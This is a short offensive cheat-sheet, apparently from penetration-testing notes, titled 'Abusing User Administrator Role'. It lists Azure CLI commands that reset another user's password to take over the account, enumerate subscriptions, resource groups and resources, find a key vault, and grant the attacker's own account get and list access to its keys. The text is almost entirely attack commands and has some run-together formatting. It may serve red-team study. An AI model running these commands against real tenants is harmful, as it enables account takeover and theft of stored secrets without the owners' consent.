Abusing User Administrator Role
PS /home/otter> az ad user update --id "secureuser@minions.onmicrosoft.com" --password "SomethingSecure123!"# set subscription id
PS /home/otter> az account set --subscription <subscription_id>
# show all resource groups in the subscription
PS /home/otter> az group list -otable
# show all resources inside a resource group
PS /home/otter> az resource list --resource-group <resource_group_name>
# if we already know where the key vault is we can just query for its information right away
PS /home/otter> az resource list --name <key_vault_name>
# delegate access to the key vault to our initial user
PS /home/otter> az keyvault set-policy -n <key_vault_name> --key-permission get list --upn otter@minion.onmicrosoft.comLast updated